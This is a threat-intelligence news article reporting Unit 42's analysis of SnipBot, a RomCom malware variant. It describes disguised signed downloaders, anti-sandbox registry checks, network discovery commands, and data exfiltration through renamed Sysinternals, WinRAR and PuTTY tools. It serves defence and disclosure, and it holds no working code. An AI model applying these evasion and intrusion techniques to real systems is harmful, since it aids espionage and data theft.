SnipBot, A New RomCom Malware Variant Targets Broad Industries for Espionage

A new variant of the RomCom malware family, named SnipBot, was uncovered in early April 2024 by Palo Alto Networks researchers Dominik Reichel and Yaron Samuel. This strain exhibits advanced code obfuscation techniques and additional tactics not present in earlier versions, such as RomCom 3.0 and PEAPOD. The earliest traces of SnipBot's activity date back to December 2023. Although the specific goals of the malware are not entirely clear, Unit 42 researchers note, "the behavior we observed suggests that the attacker's aim might involve pivoting through the victim's network to exfiltrate certain files." Active since at least 2022, the threat actor behind SnipBot has been involved in ransomware, extortion, and targeted credential gathering, potentially supporting broader intelligence-gathering efforts. The malware does not overtly target specific geographic or industry verticals; instead, it uses generalized email vectors and masquerading executables, indicating a possibly wide target scope.

Unit 42 researchers detailed that "this threat operates in multiple stages, starting with an initial downloader that is an executable, often followed by further EXEs or DLLs." Notably, the initial downloader is signed with a legitimate code signing certificate, likely acquired through theft or fraudulent purchase, while subsequent modules remain unsigned. The threat actors have leveraged the temp[.]sh file sharing service to host their payloads, utilizing its three-day hosting limit to maintain a transient infrastructure. The execution typically begins with the malware disguised as a legitimate document, like 'Attachment_Medical report.exe', which is also signed with a valid certificate.

The malware conducts several anti-analysis checks to evade detection, including querying the registry for the number of entries in "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs", checking for over 100 entries which might indicate a regular user environment rather than a sandbox. Newly analyzed versions have added checks for the Shell Bags registry key "HKCU\Software\Microsoft\Windows\Shell\Bags", specifically looking for at least 50 sub-keys, another indicator aimed at discerning genuine user systems from analysis environments.

A walkthrough of post-infection activities occurring on April 4, 2024, took place over four hours. The sequence begins with the malware execution phase where a malicious executable, named "Attachment_Medical report.exe", downloads and executes various components, including a PDF and DLL files from a remote server. Following this, the discovery phase is initiated where the attacker employs various system and network discovery commands like nltest /domain_trusts, nltest /dclist, systeminfo, net view, arp, and various ping commands to gather detailed information about the local environment and network resources.

In the delivery phase, the attackers download new configuration files and tools necessary for their next steps. DLL files are downloaded to the AppData\local\temp directory and executed with rundll32. Another notable activity is the use of PowerShell's Invoke-WebRequest command to fetch the AdExplorer executable from a remote server; however, this file was then saved and renamed as fsutil.exe. Its execution, while renamed, is indicated with the use of the accepteula flag in the command line, indicative of a Sysinternals tool being employed and specifically for AdExplorer, a snapshot was created.

The attack sequence culminates in data exfiltration where PowerShell's Invoke-WebRequest is again utilized to download WinRAR for archiving targeted files, followed by data transfer using a disguised PuTTY Secure Copy client named dsutil.exe. Despite extensive activities, the threat actors ceased their operation due to restricted access to critical company resources, "the attacker abandoned the victim’s system because its access to company sources was restricted, making it uninteresting for the attacker." Insights from Sophos, coupled with observations from Unit 42, suggest a shift in the attacker's focus from financial gain to potentially espionage-oriented objectives, given that recent cases have shown the absence of ransomware, which had previously been deployed. This leads Unit 42 researchers to "suspect this threat actor has shifted its aim away from pure financial gain toward espionage."